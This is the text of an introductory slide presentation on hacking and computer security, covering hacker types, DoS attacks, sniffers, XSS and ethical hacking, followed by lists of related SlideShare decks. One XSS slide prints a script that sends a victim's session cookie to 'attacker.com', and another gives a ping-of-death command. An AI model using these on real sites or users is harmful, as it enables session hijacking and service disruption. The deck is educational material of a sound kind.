SlideShare a Scribd company logo
HACKING
Computer Security
Team Presentation By:
Shakti Ranjan
What is Hacking?
Hacking
Just like burglars break into houses, hackers break into
computers. Do you ever wonder how hackers get inside
your computer? How can you stop them?
Hacking is a term used to refer to activities aimed at exploiting
security flaws to obtain critical information for gaining access to
secured networks.
Types of hackers

Professional hackers

Black Hats – the Bad Guys

White Hats – Professional Security Experts

Script kiddies

Mostly kids/students
− User tools created by black hats,

To get free stuff

Impress their peers

Not get caught

Underemployed Adult Hackers

Former Script Kiddies
− Can’t get employment in the field
− Want recognition in hacker community
− Big in eastern european countries

Ideological Hackers

hack as a mechanism to promote some political or ideological purpose

Usually coincide with political events
Hacker Terms

Hacking - showing computer expertise

Cracking - breaching security on software or systems

Phreaking - cracking telecom networks

Spoofing - faking the originating IP address in a datagram

Denial of Service (DoS) - flooding a host with sufficient
network traffic so that it can’t respond anymore

Port Scanning - searching for vulnerabilities
Basic Hacking Skills
 Learn how to program.
This, of course, is the fundamental hacking skill. If you don't know any computer
languages, you cant do hacking.
 Get one of the open-source Unix's and learn to use and run it
The single most important step any newbie can take towards acquiring hacker
skills is to get a copy of Linux or one of the BSD-Unix’s, install it on a personal
machine, and run it.
 Learn how to use the World Wide Web and write HTML.
To be worthwhile, your page must have content -- it must be interesting and/or
useful to other hackers.
General Hacking Methods
 A typical attacker works in the following manner:
1. Identify the target system.
1. Gathering Information on the target system.
1. Finding a possible loophole in the target system.
1. Exploiting this loophole using exploit code.
1. Removing all traces from the log files and escaping without a trace.
IP Addresses
 Every system connected to a network has a unique Internet Protocol (IP)
Address which acts as its identity on that network.
 An IP Address is a 32-bit address which is divided into four fields of 8-bits each.
For Example, 203.94.35.12
 All data sent or received by a system will be addressed from or to the system.
 An attacker’s first step is to find out the IP Address of the target system.
IP Addresses: Finding out an IP Address
 A remote IP Address can easily be found out by any of the following methods:
Through Instant Messaging Software
Through Internet Relay Chat
Through Your website
Through Email Headers
Finding an IP Address via Instant Messengers
 Case: If you are chatting on messengers like MSN, YAHOO etc. then the
following indirect connection exists between your system and your friend’s
system:
Your System------Chat Server---- Friend’s System
Friend’s System---------Chat Server------- Your System
Thus in this case, you first have to establish a direct connection with your
friend’s computer by either sending him a file or by using the call feature.
Then, goto MSDOS or the command line and type:
C:>netstat -n
This command will give you the IP Address of your friend’s computer.
Finding an IP Address via Email Headers
 Hotmail.com along with numerous other Email Service Providers, add the IP
Address of the sender to each outgoing email.
 A Typical excerpt of such a Header of an email sent from a Hotmail account is:
Return-Path: <XXX@hotmail.com>
Received: from hotmail.com by sbcglobal.net
(8.9.1/1.1.20.3/13Oct08-0620AM)
id TAA0000032714; Sun, 12 OCT 2008 19:02:21 +0530 (CST)
Message-ID: <20000123133014.34531.qmail@hotmail.com>
Received: from 202.54.109.174 by www.hotmail.com with HTTP;Sun, Sun,
12 OCT 2008 05:30:14 PST
X-Originating-IP: [202.xx.109.174]
IP Addresses: Dangers & Concerns
Dangers & Concerns
 DOS Attacks
 Disconnect from the Internet
 Trojans Exploitation
 Geographical Information
 File Sharing Exploits
Various Types of Attacks
There are an endless number of attacks, which a system administrator has to
protect his system from. However, the most common ones are:
 Denial of Services attacks (DOS Attacks)
 Threat from Sniffing and Key Logging
 Trojan Attacks
 IP Spoofing
 Buffer Overflows
 All other types of Attacks
THREAT TO INDIA
Days after the international hacker group Anonymous brought down Reliance's internet services, the
Computer Emergency Response Team India (CERT-In) has warned that websites of reputed
government and private organisations are under threat
"It is observed that some hacker groups are launching Distributed Denial of Service (DDoS) attacks
on websites of government and private organisations in India.In a recent written reply in the Lok
Sabha, Minister of State for Communications and IT Sachin Pilot said 112 government websites,
including that of Bharat Sanchar Nigam Ltd (BSNL), were hacked in just three months
"These attacks are being launched through popular DDoS tools and can consume bandwidth
requiring appropriate proactive actions in coordination with service providers,"
Denial of Services (DOS) Attacks
DOS Attacks are aimed at denying valid, legitimate Internet and Network users
access to the services offered by the target system.
In other words, a DOS attack is one in which you clog up so much memory on the
target system that it cannot serve legitimate users.
There are numerous types of Denial of Services Attacks or DOS Attacks.
DOS Attacks: Ping of Death Attack
The maximum packet size allowed to be transmitted by TCPIP on a network is 65
536 bytes.
In the Ping of Death Attack, a packet having a size greater than this maximum
size allowed by TCPIP, is sent to the target system.
As soon as the target system receives a packet exceeding the allowable size,
then it crashes, reboots or hangs.
This attack can easily be executed by the ‘ping’ command as follows:
ping -l 65540 hostname
Threats from Sniffers and Key Loggers
 Sniffers: capture all data packets being sent across the network in
the raw form.
Commonly Used for:
 Traffic Monitoring
 Network Trouble shooting
 Gathering Information on Attacker.
 For stealing company Secrets and sensitive data.
 Commonly Available Sniffers
 tcpdump
 Ethereal
 Dsniff
NETWORK HACKING
Overview of Internet Security
UIC Education Center 19
A Typical Hack
Internet
Public
DNS Server
2
22
2
Web Server
(Internal Users)
DB Servers
DB Server
App Servers
TRUSTED eC SEGMENT
SAN
S/W Load
Balancing
SAN
Firewall
DMZ
Web Servers
FTP Drop
H/W or S/W
Load
Balancing
2
4
Firewall Firewall
Corporate
LAN
Employees & Other
Internal Users
Trusted Business
Partners
Extranet
Firewall
Level
IV Data
Attacking other users: XSS

Reflected XSS

User-input is reflected to web page
− Common vulnerability is reflection of input for an error message

Exploitation:
User logs in
Attacker feeds crafted URL
User requests attacker’s
URL
Server responds with
attacker’s Javascript
User’s browser sends session
token to attacker
Attacker hijacks user’s session
Attacking other users: XSS
 Reflected XSS
 Exploit:
1. User logs on as normal and obtains a session cookie
2. Attacker feeds a URL to the user
 https://bobadilla.engr.scu.edu/error.php?message=<script>var+i=new+Image;
+i.src=“http://attacker.com/”%2bddocument.cookie;</script>
1. The user requests from the application the URL fed to them by the attacker
2. The server responds to the user’s request; the answer contains the javascript
3. User browser receives and executes the javascript
 var I = new Image; i.src=http://attacker.com/+document.cookie
1. Code causes the user’s browser to make a request to attacker.com which
contains the current session token
2. Attacker monitors requests to attacker.com and captures the token in order
to be able to perform arbitrary actions as the user
Attacking other users: XSS

Stored XSS Vulnerability
Attacker submits question
containing malicious
Javascript
User logs in and views
attackers question
Server responds with
attacker’s JavascriptAttacker’s Javascript
executes in user’s
browser
User’s browser sends session
token to attacker
Attacker hijacks user’s session
Vulnerability
What is a vulnerability?
Today’s computer software is very complex, comprised of thousands of lines of code. Since
software is written by humans, it’s hardly surprising that they contain programming mistakes,
known as vulnerabilities. These loopholes are used by hackers to break into systems; they are also
used by authors of malicious code to launch their programs automatically on your computer.
Ethical Hacking

Independent computer security
Professionals breaking into the
computer systems.

Neither damage the target systems
nor steal information.

Evaluate target systems security and
report back to owners about the
vulnerabilities found.
Ethical Hackers but not Criminal
Hackers

Completely trustworthy.

Strong programming and computer
networking skills.

Learn about the system and trying to find
its weaknesses.

Techniques of Criminal hackers-Detection-
Prevention.

Published research papers or released
security software.

No Ex-hackers.
Being Prepared

What can an intruder see on the target systems?

What can an intruder do with that information?

Does anyone at the target notice the intruder's attempts or
successes?
1. What are you trying to protect?
2. Who are you trying to protect against?
3. How much time, effort, and money are you willing to
expend to obtain adequate protection?
Hands-On Ethical Hacking and Network Defense 27

Ethical hackers
 Employed by companies to perform penetration tests

Penetration test
 Legal attempt to break into a company’s network to find its
weakest link
 Tester only reports findings, does not solve problems

Security test
 More than an attempt to break in; also includes analyzing
company’s security policy and procedures
 Tester offers solutions to secure or protect the network
Hands-On Ethical Hacking and Network Defense 28

Hackers
 Access computer system or network without authorization
 Breaks the law; can go to prison

Crackers
 Break into systems to steal or destroy data
 U.S. Department of Justice calls both hackers

Ethical hacker
 Performs most of the same activities but with owner’s permission
Computer Crimes

Financial Fraud

Credit Card Theft

Identity Theft

Computer specific crimes

Denial-of-service

Denial of access to information

Viruses Melissa virus cost New Jersey man 20 months in jail
− Melissa caused in excess of $80 Million

Intellectual Property Offenses

Information theft

Trafficking in pirated information

Storing pirated information

Compromising information

Destroying information

Content related Offenses

Hate crimes

Harrassment

Cyber-stalking

Child privacy
UIC Education Center 30
Question and Answer
Q&A
?
?
UIC Education Center 31
Suggestions!!..

More Related Content

What's hot (20)

Module 8 System Hacking
Module 8   System HackingModule 8   System Hacking
Module 8 System Hacking
leminhvuong
 
Ceh v5 module 13 web based password cracking techniques
Ceh v5 module 13 web based password cracking techniquesCeh v5 module 13 web based password cracking techniques
Ceh v5 module 13 web based password cracking techniques
Vi Tính Hoàng Nam
 
Ch08 Microsoft Operating System Vulnerabilities
Ch08 Microsoft Operating System VulnerabilitiesCh08 Microsoft Operating System Vulnerabilities
Ch08 Microsoft Operating System Vulnerabilities
phanleson
 
Module 2 Foot Printing
Module 2   Foot PrintingModule 2   Foot Printing
Module 2 Foot Printing
leminhvuong
 
Ceh v5 module 06 trojans and backdoors
Ceh v5 module 06 trojans and backdoorsCeh v5 module 06 trojans and backdoors
Ceh v5 module 06 trojans and backdoors
Vi Tính Hoàng Nam
 
Ceh v5 module 05 system hacking
Ceh v5 module 05 system hackingCeh v5 module 05 system hacking
Ceh v5 module 05 system hacking
Vi Tính Hoàng Nam
 
System hacking
System hackingSystem hacking
System hacking
CAS
 
CEHv7 Question Collection
CEHv7 Question CollectionCEHv7 Question Collection
CEHv7 Question Collection
Manish Luintel
 
Lecture 2
Lecture 2Lecture 2
Lecture 2
Education
 
Meletis Belsis - Introduction to information security
Meletis Belsis - Introduction to information securityMeletis Belsis - Introduction to information security
Meletis Belsis - Introduction to information security
Meletis Belsis MPhil/MRes/BSc
 
Ceh v5 module 07 sniffers
Ceh v5 module 07 sniffersCeh v5 module 07 sniffers
Ceh v5 module 07 sniffers
Vi Tính Hoàng Nam
 
Reconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awarenessReconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awareness
Leon Teale
 
Information-Security-Lecture-8.pptx
Information-Security-Lecture-8.pptxInformation-Security-Lecture-8.pptx
Information-Security-Lecture-8.pptx
anbersattar
 
Different types of attacks in internet
Different types of attacks in internetDifferent types of attacks in internet
Different types of attacks in internet
Rohan Bharadwaj
 
Information security & EthicalHacking
Information security & EthicalHackingInformation security & EthicalHacking
Information security & EthicalHacking
Ave Nawsh
 
Spoofing
SpoofingSpoofing
Spoofing
Sanjeev
 
Ethical hacking Chapter 1 - Overview - Eric Vanderburg
Ethical hacking   Chapter 1 - Overview - Eric VanderburgEthical hacking   Chapter 1 - Overview - Eric Vanderburg
Ethical hacking Chapter 1 - Overview - Eric Vanderburg
Eric Vanderburg
 
Ethical hacking Chapter 12 - Encryption - Eric Vanderburg
Ethical hacking   Chapter 12 - Encryption - Eric VanderburgEthical hacking   Chapter 12 - Encryption - Eric Vanderburg
Ethical hacking Chapter 12 - Encryption - Eric Vanderburg
Eric Vanderburg
 
Ethical hacking Chapter 3 - Network and Computer Attacks - Eric Vanderburg
Ethical hacking   Chapter 3 - Network and Computer Attacks - Eric VanderburgEthical hacking   Chapter 3 - Network and Computer Attacks - Eric Vanderburg
Ethical hacking Chapter 3 - Network and Computer Attacks - Eric Vanderburg
Eric Vanderburg
 
E-Mail Crimes - Gurugram Cyber Crime Cell July 2017
E-Mail Crimes - Gurugram Cyber Crime Cell July 2017E-Mail Crimes - Gurugram Cyber Crime Cell July 2017
E-Mail Crimes - Gurugram Cyber Crime Cell July 2017
Shyam Pareek
 
Module 8 System Hacking
Module 8   System HackingModule 8   System Hacking
Module 8 System Hacking
leminhvuong
 
Ceh v5 module 13 web based password cracking techniques
Ceh v5 module 13 web based password cracking techniquesCeh v5 module 13 web based password cracking techniques
Ceh v5 module 13 web based password cracking techniques
Vi Tính Hoàng Nam
 
Ch08 Microsoft Operating System Vulnerabilities
Ch08 Microsoft Operating System VulnerabilitiesCh08 Microsoft Operating System Vulnerabilities
Ch08 Microsoft Operating System Vulnerabilities
phanleson
 
Module 2 Foot Printing
Module 2   Foot PrintingModule 2   Foot Printing
Module 2 Foot Printing
leminhvuong
 
Ceh v5 module 06 trojans and backdoors
Ceh v5 module 06 trojans and backdoorsCeh v5 module 06 trojans and backdoors
Ceh v5 module 06 trojans and backdoors
Vi Tính Hoàng Nam
 
System hacking
System hackingSystem hacking
System hacking
CAS
 
CEHv7 Question Collection
CEHv7 Question CollectionCEHv7 Question Collection
CEHv7 Question Collection
Manish Luintel
 
Meletis Belsis - Introduction to information security
Meletis Belsis - Introduction to information securityMeletis Belsis - Introduction to information security
Meletis Belsis - Introduction to information security
Meletis Belsis MPhil/MRes/BSc
 
Reconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awarenessReconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awareness
Leon Teale
 
Information-Security-Lecture-8.pptx
Information-Security-Lecture-8.pptxInformation-Security-Lecture-8.pptx
Information-Security-Lecture-8.pptx
anbersattar
 
Different types of attacks in internet
Different types of attacks in internetDifferent types of attacks in internet
Different types of attacks in internet
Rohan Bharadwaj
 
Information security & EthicalHacking
Information security & EthicalHackingInformation security & EthicalHacking
Information security & EthicalHacking
Ave Nawsh
 
Spoofing
SpoofingSpoofing
Spoofing
Sanjeev
 
Ethical hacking Chapter 1 - Overview - Eric Vanderburg
Ethical hacking   Chapter 1 - Overview - Eric VanderburgEthical hacking   Chapter 1 - Overview - Eric Vanderburg
Ethical hacking Chapter 1 - Overview - Eric Vanderburg
Eric Vanderburg
 
Ethical hacking Chapter 12 - Encryption - Eric Vanderburg
Ethical hacking   Chapter 12 - Encryption - Eric VanderburgEthical hacking   Chapter 12 - Encryption - Eric Vanderburg
Ethical hacking Chapter 12 - Encryption - Eric Vanderburg
Eric Vanderburg
 
Ethical hacking Chapter 3 - Network and Computer Attacks - Eric Vanderburg
Ethical hacking   Chapter 3 - Network and Computer Attacks - Eric VanderburgEthical hacking   Chapter 3 - Network and Computer Attacks - Eric Vanderburg
Ethical hacking Chapter 3 - Network and Computer Attacks - Eric Vanderburg
Eric Vanderburg
 
E-Mail Crimes - Gurugram Cyber Crime Cell July 2017
E-Mail Crimes - Gurugram Cyber Crime Cell July 2017E-Mail Crimes - Gurugram Cyber Crime Cell July 2017
E-Mail Crimes - Gurugram Cyber Crime Cell July 2017
Shyam Pareek
 

Viewers also liked (15)

Revista Animador Flash Edición 1
Revista Animador Flash Edición 1Revista Animador Flash Edición 1
Revista Animador Flash Edición 1
Cristian Ruiz
 
Fotoshop 1209474579196149-8
Fotoshop 1209474579196149-8Fotoshop 1209474579196149-8
Fotoshop 1209474579196149-8
Sandra Samaniego
 
Digital 2015
Digital 2015Digital 2015
Digital 2015
Sebastian Escobar
 
Hacking
HackingHacking
Hacking
Mohamad Fadhil Yaacob
 
Proekt na temu_fotoshop_skripnik_v_10_klas
Proekt na temu_fotoshop_skripnik_v_10_klasProekt na temu_fotoshop_skripnik_v_10_klas
Proekt na temu_fotoshop_skripnik_v_10_klas
Наталя Шуйська
 
Transformaciones
TransformacionesTransformaciones
Transformaciones
Arpon Files
 
Ethical hacking ppt
Ethical hacking pptEthical hacking ppt
Ethical hacking ppt
Rohit Yadav
 
Auditing In Computer Environment Presentation
Auditing In Computer Environment PresentationAuditing In Computer Environment Presentation
Auditing In Computer Environment Presentation
EMAC Consulting Group
 
History of Computer, Generations of Computer
History of Computer, Generations of ComputerHistory of Computer, Generations of Computer
History of Computer, Generations of Computer
Arthur Glenn Guillen
 
Computer Generation Presentation
Computer Generation PresentationComputer Generation Presentation
Computer Generation Presentation
Jayesh Modi
 
GENERATIONS OF COMPUTER
GENERATIONS OF COMPUTERGENERATIONS OF COMPUTER
GENERATIONS OF COMPUTER
Rajat More
 
Presentation on Input and Output Devices
Presentation on Input and Output DevicesPresentation on Input and Output Devices
Presentation on Input and Output Devices
Zobia Aziz
 
Computer Virus powerpoint presentation
Computer Virus powerpoint presentationComputer Virus powerpoint presentation
Computer Virus powerpoint presentation
shohrabkhan
 
Computer and Internet hacking
Computer and Internet hackingComputer and Internet hacking
Computer and Internet hacking
Hariharan Sivadasan
 
PPT on mind reading computer
 PPT on mind reading computer PPT on mind reading computer
PPT on mind reading computer
Anjali Agarwal
 
Revista Animador Flash Edición 1
Revista Animador Flash Edición 1Revista Animador Flash Edición 1
Revista Animador Flash Edición 1
Cristian Ruiz
 
Fotoshop 1209474579196149-8
Fotoshop 1209474579196149-8Fotoshop 1209474579196149-8
Fotoshop 1209474579196149-8
Sandra Samaniego
 
Transformaciones
TransformacionesTransformaciones
Transformaciones
Arpon Files
 
Ethical hacking ppt
Ethical hacking pptEthical hacking ppt
Ethical hacking ppt
Rohit Yadav
 
Auditing In Computer Environment Presentation
Auditing In Computer Environment PresentationAuditing In Computer Environment Presentation
Auditing In Computer Environment Presentation
EMAC Consulting Group
 
History of Computer, Generations of Computer
History of Computer, Generations of ComputerHistory of Computer, Generations of Computer
History of Computer, Generations of Computer
Arthur Glenn Guillen
 
Computer Generation Presentation
Computer Generation PresentationComputer Generation Presentation
Computer Generation Presentation
Jayesh Modi
 
GENERATIONS OF COMPUTER
GENERATIONS OF COMPUTERGENERATIONS OF COMPUTER
GENERATIONS OF COMPUTER
Rajat More
 
Presentation on Input and Output Devices
Presentation on Input and Output DevicesPresentation on Input and Output Devices
Presentation on Input and Output Devices
Zobia Aziz
 
Computer Virus powerpoint presentation
Computer Virus powerpoint presentationComputer Virus powerpoint presentation
Computer Virus powerpoint presentation
shohrabkhan
 
PPT on mind reading computer
 PPT on mind reading computer PPT on mind reading computer
PPT on mind reading computer
Anjali Agarwal
 

Similar to Hack the hack (20)

presentation of professionalism harwares.ppt
presentation of professionalism harwares.pptpresentation of professionalism harwares.ppt
presentation of professionalism harwares.ppt
JayPatil820512
 
31.ppt
31.ppt31.ppt
31.ppt
KarmanChandi
 
Introduction to the Ethical hacking.pptx
Introduction to the Ethical hacking.pptxIntroduction to the Ethical hacking.pptx
Introduction to the Ethical hacking.pptx
SahilSwe
 
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECTHACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
DHRUV562167
 
Ethical hacking is a based on computer hacking
Ethical hacking is a based on computer hackingEthical hacking is a based on computer hacking
Ethical hacking is a based on computer hacking
sxkkjbzq2k
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
aashish2cool4u
 
Hacking Presentation
Hacking PresentationHacking Presentation
Hacking Presentation
Animesh Behera
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Security
belsis
 
hacking
hackinghacking
hacking
ADAIKKAPPANS1
 
Ehical Hacking: Unit no. 1 Information and Network Security
Ehical Hacking: Unit no. 1 Information and Network SecurityEhical Hacking: Unit no. 1 Information and Network Security
Ehical Hacking: Unit no. 1 Information and Network Security
prachi67
 
Cyper security & Ethical hacking
Cyper security & Ethical hackingCyper security & Ethical hacking
Cyper security & Ethical hacking
Cmano Kar
 
Introduction of hacking and cracking
Introduction of hacking and crackingIntroduction of hacking and cracking
Introduction of hacking and cracking
Harshil Barot
 
IBPS SO
IBPS SOIBPS SO
IBPS SO
Jitendra kadu
 
Ethical_Hacking_ppt
Ethical_Hacking_pptEthical_Hacking_ppt
Ethical_Hacking_ppt
Narayanan
 
basic knowhow hacking
basic knowhow hackingbasic knowhow hacking
basic knowhow hacking
Anant Shrivastava
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
Syed Irshad Ali
 
web-security-1215757214755670-9.pdf
web-security-1215757214755670-9.pdfweb-security-1215757214755670-9.pdf
web-security-1215757214755670-9.pdf
LucaMartins7
 
Hacking
HackingHacking
Hacking
Tushar Moolya
 
Event - Internet Thailand - Total Security Perimeters
Event - Internet Thailand - Total Security PerimetersEvent - Internet Thailand - Total Security Perimeters
Event - Internet Thailand - Total Security Perimeters
Somyos U.
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
Prabhat kumar Suman
 
presentation of professionalism harwares.ppt
presentation of professionalism harwares.pptpresentation of professionalism harwares.ppt
presentation of professionalism harwares.ppt
JayPatil820512
 
Introduction to the Ethical hacking.pptx
Introduction to the Ethical hacking.pptxIntroduction to the Ethical hacking.pptx
Introduction to the Ethical hacking.pptx
SahilSwe
 
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECTHACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
DHRUV562167
 
Ethical hacking is a based on computer hacking
Ethical hacking is a based on computer hackingEthical hacking is a based on computer hacking
Ethical hacking is a based on computer hacking
sxkkjbzq2k
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Security
belsis
 
Ehical Hacking: Unit no. 1 Information and Network Security
Ehical Hacking: Unit no. 1 Information and Network SecurityEhical Hacking: Unit no. 1 Information and Network Security
Ehical Hacking: Unit no. 1 Information and Network Security
prachi67
 
Cyper security & Ethical hacking
Cyper security & Ethical hackingCyper security & Ethical hacking
Cyper security & Ethical hacking
Cmano Kar
 
Introduction of hacking and cracking
Introduction of hacking and crackingIntroduction of hacking and cracking
Introduction of hacking and cracking
Harshil Barot
 
Ethical_Hacking_ppt
Ethical_Hacking_pptEthical_Hacking_ppt
Ethical_Hacking_ppt
Narayanan
 
web-security-1215757214755670-9.pdf
web-security-1215757214755670-9.pdfweb-security-1215757214755670-9.pdf
web-security-1215757214755670-9.pdf
LucaMartins7
 
Event - Internet Thailand - Total Security Perimeters
Event - Internet Thailand - Total Security PerimetersEvent - Internet Thailand - Total Security Perimeters
Event - Internet Thailand - Total Security Perimeters
Somyos U.
 

Recently uploaded (20)

FL Studio Producer Edition Crack 2025 Full Version
FL Studio Producer Edition Crack 2025 Full VersionFL Studio Producer Edition Crack 2025 Full Version
FL Studio Producer Edition Crack 2025 Full Version
tahirabibi60507
 
Get & Download Wondershare Filmora Crack Latest [2025]
Get & Download Wondershare Filmora Crack Latest [2025]Get & Download Wondershare Filmora Crack Latest [2025]
Get & Download Wondershare Filmora Crack Latest [2025]
saniaaftab72555
 
Avast Premium Security Crack FREE Latest Version 2025
Avast Premium Security Crack FREE Latest Version 2025Avast Premium Security Crack FREE Latest Version 2025
Avast Premium Security Crack FREE Latest Version 2025
mu394968
 
Minitab 22 Full Crack Plus Product Key Free Download [Latest] 2025
Minitab 22 Full Crack Plus Product Key Free Download [Latest] 2025Minitab 22 Full Crack Plus Product Key Free Download [Latest] 2025
Minitab 22 Full Crack Plus Product Key Free Download [Latest] 2025
wareshashahzadiii
 
Proactive Vulnerability Detection in Source Code Using Graph Neural Networks:...
Proactive Vulnerability Detection in Source Code Using Graph Neural Networks:...Proactive Vulnerability Detection in Source Code Using Graph Neural Networks:...
Proactive Vulnerability Detection in Source Code Using Graph Neural Networks:...
Ranjan Baisak
 
Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...
Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...
Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...
Eric D. Schabell
 
Adobe Illustrator Crack FREE Download 2025 Latest Version
Adobe Illustrator Crack FREE Download 2025 Latest VersionAdobe Illustrator Crack FREE Download 2025 Latest Version
Adobe Illustrator Crack FREE Download 2025 Latest Version
kashifyounis067
 
Shift Left using Lean for Agile Software Development
Shift Left using Lean for Agile Software DevelopmentShift Left using Lean for Agile Software Development
Shift Left using Lean for Agile Software Development
SathyaShankar6
 
Exploring Wayland: A Modern Display Server for the Future
Exploring Wayland: A Modern Display Server for the FutureExploring Wayland: A Modern Display Server for the Future
Exploring Wayland: A Modern Display Server for the Future
ICS
 
Salesforce Aged Complex Org Revitalization Process .pdf
Salesforce Aged Complex Org Revitalization Process .pdfSalesforce Aged Complex Org Revitalization Process .pdf
Salesforce Aged Complex Org Revitalization Process .pdf
SRINIVASARAO PUSULURI
 
Adobe Illustrator Crack | Free Download & Install Illustrator
Adobe Illustrator Crack | Free Download & Install IllustratorAdobe Illustrator Crack | Free Download & Install Illustrator
Adobe Illustrator Crack | Free Download & Install Illustrator
usmanhidray
 
Kubernetes_101_Zero_to_Platform_Engineer.pptx
Kubernetes_101_Zero_to_Platform_Engineer.pptxKubernetes_101_Zero_to_Platform_Engineer.pptx
Kubernetes_101_Zero_to_Platform_Engineer.pptx
CloudScouts
 
Scaling GraphRAG: Efficient Knowledge Retrieval for Enterprise AI
Scaling GraphRAG:  Efficient Knowledge Retrieval for Enterprise AIScaling GraphRAG:  Efficient Knowledge Retrieval for Enterprise AI
Scaling GraphRAG: Efficient Knowledge Retrieval for Enterprise AI
danshalev
 
Download YouTube By Click 2025 Free Full Activated
Download YouTube By Click 2025 Free Full ActivatedDownload YouTube By Click 2025 Free Full Activated
Download YouTube By Click 2025 Free Full Activated
saniamalik72555
 
Download Wondershare Filmora Crack [2025] With Latest
Download Wondershare Filmora Crack [2025] With LatestDownload Wondershare Filmora Crack [2025] With Latest
Download Wondershare Filmora Crack [2025] With Latest
tahirabibi60507
 
EASEUS Partition Master Crack + License Code
EASEUS Partition Master Crack + License CodeEASEUS Partition Master Crack + License Code
EASEUS Partition Master Crack + License Code
aneelaramzan63
 
Adobe After Effects Crack FREE FRESH version 2025
Adobe After Effects Crack FREE FRESH version 2025Adobe After Effects Crack FREE FRESH version 2025
Adobe After Effects Crack FREE FRESH version 2025
kashifyounis067
 
PDF Reader Pro Crack Latest Version FREE Download 2025
PDF Reader Pro Crack Latest Version FREE Download 2025PDF Reader Pro Crack Latest Version FREE Download 2025
PDF Reader Pro Crack Latest Version FREE Download 2025
mu394968
 
Maxon CINEMA 4D 2025 Crack FREE Download LINK
Maxon CINEMA 4D 2025 Crack FREE Download LINKMaxon CINEMA 4D 2025 Crack FREE Download LINK
Maxon CINEMA 4D 2025 Crack FREE Download LINK
younisnoman75
 
How to Optimize Your AWS Environment for Improved Cloud Performance
How to Optimize Your AWS Environment for Improved Cloud PerformanceHow to Optimize Your AWS Environment for Improved Cloud Performance
How to Optimize Your AWS Environment for Improved Cloud Performance
ThousandEyes
 
FL Studio Producer Edition Crack 2025 Full Version
FL Studio Producer Edition Crack 2025 Full VersionFL Studio Producer Edition Crack 2025 Full Version
FL Studio Producer Edition Crack 2025 Full Version
tahirabibi60507
 
Get & Download Wondershare Filmora Crack Latest [2025]
Get & Download Wondershare Filmora Crack Latest [2025]Get & Download Wondershare Filmora Crack Latest [2025]
Get & Download Wondershare Filmora Crack Latest [2025]
saniaaftab72555
 
Avast Premium Security Crack FREE Latest Version 2025
Avast Premium Security Crack FREE Latest Version 2025Avast Premium Security Crack FREE Latest Version 2025
Avast Premium Security Crack FREE Latest Version 2025
mu394968
 
Minitab 22 Full Crack Plus Product Key Free Download [Latest] 2025
Minitab 22 Full Crack Plus Product Key Free Download [Latest] 2025Minitab 22 Full Crack Plus Product Key Free Download [Latest] 2025
Minitab 22 Full Crack Plus Product Key Free Download [Latest] 2025
wareshashahzadiii
 
Proactive Vulnerability Detection in Source Code Using Graph Neural Networks:...
Proactive Vulnerability Detection in Source Code Using Graph Neural Networks:...Proactive Vulnerability Detection in Source Code Using Graph Neural Networks:...
Proactive Vulnerability Detection in Source Code Using Graph Neural Networks:...
Ranjan Baisak
 
Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...
Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...
Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...
Eric D. Schabell
 
Adobe Illustrator Crack FREE Download 2025 Latest Version
Adobe Illustrator Crack FREE Download 2025 Latest VersionAdobe Illustrator Crack FREE Download 2025 Latest Version
Adobe Illustrator Crack FREE Download 2025 Latest Version
kashifyounis067
 
Shift Left using Lean for Agile Software Development
Shift Left using Lean for Agile Software DevelopmentShift Left using Lean for Agile Software Development
Shift Left using Lean for Agile Software Development
SathyaShankar6
 
Exploring Wayland: A Modern Display Server for the Future
Exploring Wayland: A Modern Display Server for the FutureExploring Wayland: A Modern Display Server for the Future
Exploring Wayland: A Modern Display Server for the Future
ICS
 
Salesforce Aged Complex Org Revitalization Process .pdf
Salesforce Aged Complex Org Revitalization Process .pdfSalesforce Aged Complex Org Revitalization Process .pdf
Salesforce Aged Complex Org Revitalization Process .pdf
SRINIVASARAO PUSULURI
 
Adobe Illustrator Crack | Free Download & Install Illustrator
Adobe Illustrator Crack | Free Download & Install IllustratorAdobe Illustrator Crack | Free Download & Install Illustrator
Adobe Illustrator Crack | Free Download & Install Illustrator
usmanhidray
 
Kubernetes_101_Zero_to_Platform_Engineer.pptx
Kubernetes_101_Zero_to_Platform_Engineer.pptxKubernetes_101_Zero_to_Platform_Engineer.pptx
Kubernetes_101_Zero_to_Platform_Engineer.pptx
CloudScouts
 
Scaling GraphRAG: Efficient Knowledge Retrieval for Enterprise AI
Scaling GraphRAG:  Efficient Knowledge Retrieval for Enterprise AIScaling GraphRAG:  Efficient Knowledge Retrieval for Enterprise AI
Scaling GraphRAG: Efficient Knowledge Retrieval for Enterprise AI
danshalev
 
Download YouTube By Click 2025 Free Full Activated
Download YouTube By Click 2025 Free Full ActivatedDownload YouTube By Click 2025 Free Full Activated
Download YouTube By Click 2025 Free Full Activated
saniamalik72555
 
Download Wondershare Filmora Crack [2025] With Latest
Download Wondershare Filmora Crack [2025] With LatestDownload Wondershare Filmora Crack [2025] With Latest
